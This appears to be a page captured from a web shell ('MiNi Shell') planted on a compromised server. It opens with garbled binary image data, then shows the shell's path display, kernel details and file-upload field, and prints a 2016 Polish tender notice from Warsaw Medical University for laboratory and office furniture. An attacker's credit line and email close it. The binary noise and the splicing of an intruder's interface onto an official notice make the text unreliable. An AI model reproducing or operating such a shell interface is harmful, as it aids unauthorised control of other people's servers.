JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160610/81201-N-2016.html

<p class="kh_header"><b>Warszawa: Dostawa, montaż i ustawienie mebli laboratoryjnych i biurowych w podziale na pakiety, znak sprawy - AEZ/S-087/2016</b><br>
<b>Numer ogłoszenia: 81201 - 2016; data zamieszczenia: 10.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Warszawski Uniwersytet Medyczny , ul. Żwirki i Wigury 61, 02-091 Warszawa, woj. mazowieckie, tel. 22 5720366, faks 22 5720363.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> wum.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa, montaż i ustawienie mebli laboratoryjnych i biurowych w podziale na pakiety, znak sprawy - AEZ/S-087/2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest dostawa, montaż i ustawienie mebli laboratoryjnych i biurowych w podziale na pakiety:
Pakiet 1 - Meble laboratoryjne dla Katedry Farmacji Stosowanej i Bioinżynierii WUM,
Pakiet 2 - Meble laboratoryjne dla potrzeb Zakładu Farmacji Stosowanej WUM w ramach projektu MentorEye,
Pakiet 3 - Meble laboratoryjne dla potrzeb Katedry i Zakładu Patomorfologii WUM,
Pakiet 4 - Meble biurowe dla potrzeb Zakładu Informatyki Medycznej i Telemedycyny,
Pakiet 5 - Krzesła dla potrzeb Katedry i Zakładu Chemii Nieorganicznej i Analitycznej WUM.
Szczegółowe opisy przedmiotu zamówienia zostały określone w Formularzach asortymentowo-cenowych, o których mowa w części II SIWZ, stanowiących  odpowiednio Załączniki od 2.1 do 2.5 oraz w odniesieniu do Pakietów 1, 2 i 3 w Formularz wymaganych warunków technicznych - Załączniki od 3.1 do 3.3 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.13.10.00-9, 39.11.30.00-7, 39.12.10.00-6, 39.18.00.00-7, 39.18.10.00-4, 39.14.13.00-5, 44.42.10.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zgodnie z treścią Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U.  z 2013 r., poz. 231), zwanego dalej Rozporządzeniem, w celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności, posiada wiedzę i doświadczenie, dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia oraz znajduje się w sytuacji ekonomicznej i finansowej umożliwiającej realizację zamówienia Wykonawca składa:
1) Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych dostaw, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. 
W odniesieniu do Pakietu 3 - w celu potwierdzenia spełnienia powyższego warunku Wykonawca zobowiązany jest do przedstawienia w ww. wykazie głównych dostaw, wykonanych lub wykonywanych  w okresie ostatnich trzech lat przed upływem terminu składania ofert, w tym dostawy mebli laboratoryjnych o wartości nie mniejszej niż 50 000,00 złotych, potwierdzonych załączonymi do oferty dowodami, że dostawy te zostały wykonane lub są wykonywane należycie. Wzór Wykazu dostaw stanowi Załącznik nr  5 do SIWZ.
2. Dowodami, o których mowa w ust. 1 pkt 1 , są:
1) poświadczenie, z tym że w odniesieniu do nadal wykonywanych dostaw/usług  okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert;
2) oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia o którym mowa w pkt. 1.
3. Zamawiający jednocześnie informuje, że w przypadku gdy zamawiający jest podmiotem, na rzecz którego dostawy wskazane w wykazie, o którym mowa w ust. 1 pkt 1, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w ust. 2. Ocena spełnienia tych wymagań zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawca zobowiązany jest złożyć:
1) próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez Wykonawcę na żądanie Zamawiającego;
Potwierdzeniem spełnienia ww. warunku będzie złożenie wraz z ofertą kart katalogowych oferowanych mebli, zawierających rysunki lub fotografie oferowanych produktów (Zamawiający nie dopuszcza kart katalogowych zawierających wyłącznie fotografie lub rysunki poglądowe), potwierdzających zgodność ze stanem faktycznym deklarowanych przez Wykonawcę parametrów technicznych, odpowiednio dla asortymentu, w odniesieniu do:
a) Pakietu 1: 
w odniesieniu do stołów laboratoryjnych - potwierdzeniem spełnienia ww. warunku będzie złożenie wraz z ofertą katalogu producenta lub innego dokumentu, prezentującego oferowany system meblowy, zawierającego rysunki lub fotografie, potwierdzające zgodność parametrów technicznych i technologicznych oferowanych produktów z wymaganiami określonymi w Formularzu wymaganych warunków technicznych, stanowiącym Załącznik nr 3.1 do SIWZ, przy czym Zamawiający nie wymaga aby ww. dokumenty potwierdzały wymiary mebli wymagane przez Zamawiającego. Zamawiający dopuszcza również możliwość złożenia katalogu prezentującego oferowane meble systemowe, przy czym dokument ten nie musi obejmować całego asortymentu określonego w Formularzu wymaganych warunków technicznych,
w odniesieniu do taboretów i krzeseł - złożenie wraz z ofertą kart katalogowych producenta lub innych dokumentów (zawierających rysunki lub fotografie) oferowanych taboretów i krzeseł, potwierdzających zgodność deklarowanych przez Wykonawcę parametrów technicznych (w tym wymiarów) ze stanem faktycznym, zgodnie z wymaganiami określonymi w Załączniku 3.1 do SIWZ (Formularz wymaganych warunków technicznych).
b) Pakietu 2: 
w odniesieniu do stołów laboratoryjnych - potwierdzeniem spełnienia ww. warunku będzie złożenie wraz z ofertą katalogu producenta lub innego dokumentu, prezentującego oferowany system meblowy, zawierającego rysunki lub fotografie, potwierdzające zgodność parametrów technicznych i technologicznych oferowanych produktów z wymaganiami określonymi w Formularzu wymaganych warunków technicznych, stanowiącym Załącznik nr 3.2 do SIWZ, przy czym Zamawiający nie wymaga aby ww. dokumenty potwierdzały wymiary mebli wymagane przez Zamawiającego. Zamawiający dopuszcza również możliwość złożenia katalogu prezentującego oferowane meble systemowe, przy czym dokument ten nie musi obejmować całego asortymentu określonego w Formularzu wymaganych warunków technicznych,
c) Pakietu 3: 
w odniesieniu do mebli laboratoryjnych - potwierdzeniem spełnienia ww. warunku będzie złożenie wraz z ofertą katalogu producenta lub innego dokumentu, prezentującego oferowany system meblowy, zawierającego rysunki lub fotografie, potwierdzające zgodność parametrów technicznych i technologicznych oferowanych produktów z wymaganiami określonymi w Formularzu wymaganych warunków technicznych, stanowiącym Załącznik nr 3.3 do SIWZ, przy czym Zamawiający nie wymaga aby ww. dokumenty potwierdzały wymiary mebli wymagane przez Zamawiającego. Zamawiający dopuszcza również możliwość złożenia katalogu prezentującego oferowane meble systemowe, przy czym dokument ten nie musi obejmować całego asortymentu określonego w Formularzu wymaganych warunków technicznych,
w odniesieniu do dygestorium - potwierdzeniem spełnienia ww. warunku będzie złożenie wraz z ofertą katalogu producenta lub innego dokumentu, prezentującego oferowane dygestorium, zawierającego rysunki lub fotografie, potwierdzające zgodność parametrów technicznych i technologicznych oferowanego produktu z wymaganiami określonymi w Formularzu wymaganych warunków technicznych, stanowiącym Załącznik nr 3.3 do SIWZ, przy czym Zamawiający nie wymaga aby ww. dokumenty potwierdzały wymiary wymagane przez Zamawiającego.
d) Pakietu 4 - pozycja 1 krzesło konferencyjne, pozycja 2 - ergonomiczne krzesło obrotowe - złożenie wraz z ofertą karty katalogowej producenta lub innego dokumentu (zawierającego rysunki lub fotografie) oferowanego krzesła, potwierdzającego zgodność deklarowanych przez Wykonawcę parametrów technicznych (w tym wymiarów) ze stanem faktycznym, zgodnie z wymaganiami określonymi w Załączniku 2.5 do SIWZ (Formularz asortymentowo-cenowy).
e) Pakietu 5 - w odniesieniu do poz. 1 i 2 złożenie wraz z ofertą kart katalogowych producenta lub innych dokumentów (zawierających rysunki lub fotografie) oferowanych krzeseł, potwierdzających zgodność deklarowanych przez Wykonawcę parametrów technicznych (w tym wymiarów) ze stanem faktycznym, zgodnie z wymaganiami określonymi w Załączniku 2.5 do SIWZ (Formularz asortymentowo-cenowy).
Zamawiający dopuszcza możliwość złożenia kart katalogowych jw. w formie wydruków pochodzących ze strony internetowej producenta oferowanych mebli.
Uwaga - Zamawiający nie dopuszcza kopiowania rysunków zamieszczonych w specyfikacji jako rysunki poglądowe.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Mając na uwadze postanowienia art. 144 ust. 1 ustawy, zakazujące istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, z zastrzeżeniem przewidywanych okoliczności określonych przez Zamawiającego w treści ogłoszenia o zamówieniu lub SIWZ, Zamawiający dopuszcza możliwość zmiany umowy w przypadku:
1) wycofania z dystrybucji modelu oferowanego mebla i zastąpienia go modelem należącym do tej samej linii produktowej, o parametrach co najmniej takich, jak model oferowany, lub który został udoskonalony, albo dodatkowo wyposażony, 
za cenę taką jak zaoferowana w postępowaniu;
2) zmiany terminu dostawy z przyczyn niezależnych od Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wum.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Warszawski Uniwersytet Medyczny
Dział Zamówień Publicznych, pok. 312
ul. Żwirki i Wigury 61
02-091 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2016 godzina 10:00, miejsce: Warszawski Uniwersytet Medyczny
Dział Zamówień Publicznych, pok. 312
ul. Żwirki i Wigury 61
02-091 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W zakresie Pakietu 2 zamówienie realizowane jest w ramach projektu: Opracowanie polskiego komplementarnego systemu molekularnej nawigacji chirurgicznej dla potrzeb leczenia nowotworów o akronimie MentorEye, symbol projektu: NCBR56;  współfinansowanego ze środków Narodowego Centrum Badań i Rozwoju w ramach programu: Profilaktyka i leczenie chorób cywilizacyjnych STATEGMED, na podstawie umowy nr STRATEGMED1/233624/4/NCBR/2014 z dnia 27 października 2014 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1 - Meble laboratoryjne dla Katedry Farmacji Stosowanej i Bioinżynierii WUM,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 1 - Meble laboratoryjne dla Katedry Farmacji Stosowanej i Bioinżynierii WUM, szczegółowe opisy przedmiotu zamówienia zostały określone w Formularzu asortymentowo-cenowym, o którym mowa w części II SIWZ, stanowiącym  Załącznik 2.1 oraz Formularz wymaganych warunków technicznych - Załącznik 3.1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.13.10.00-9, 39.11.30.00-7, 39.18.00.00-7, 39.18.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2 - Meble laboratoryjne dla potrzeb Zakładu Farmacji Stosowanej WUM w ramach projektu MentorEye,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 2 - Meble laboratoryjne dla potrzeb Zakładu Farmacji Stosowanej WUM w ramach projektu MentorEye, szczegółowe opisy przedmiotu zamówienia zostały określone w Formularzu asortymentowo-cenowym, o którym mowa w części II SIWZ, stanowiącym  Załącznik 2.2 oraz Formularz wymaganych warunków technicznych - Załącznik 3.2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.18.00.00-7, 39.18.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3 - Meble laboratoryjne dla potrzeb Katedry i Zakładu Patomorfologii WUM.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 3 - Meble laboratoryjne dla potrzeb Katedry i Zakładu Patomorfologii WUM, szczegółowe opisy przedmiotu zamówienia zostały określone w Formularzu asortymentowo-cenowym, o którym mowa w części II SIWZ, stanowiącym  Załącznik 2.3 oraz Formularz wymaganych warunków technicznych - Załącznik 3.3 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.13.10.00-9, 39.12.10.00-6, 39.18.00.00-7, 39.18.10.00-4, 39.14.13.00-5, 44.42.10.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4 - Meble biurowe dla potrzeb Zakładu Informatyki Medycznej i Telemedycyny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 4 - Meble biurowe dla potrzeb Zakładu Informatyki Medycznej i Telemedycyny, szczegółowe opisy przedmiotu zamówienia zostały określone w Formularzu asortymentowo-cenowym, o którym mowa w części II SIWZ, stanowiącym  Załącznik 2.4 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.13.10.00-9, 39.11.30.00-7, 39.12.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5 - Krzesła dla potrzeb Katedry i Zakładu Chemii Nieorganicznej i Analitycznej WUM..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 5 - Krzesła dla potrzeb Katedry i Zakładu Chemii Nieorganicznej i Analitycznej WUM, szczegółowe opisy przedmiotu zamówienia zostały określone w Formularzu asortymentowo-cenowym, o którym mowa w części II SIWZ, stanowiącym  Załącznik 2.5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.13.10.00-9, 39.11.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com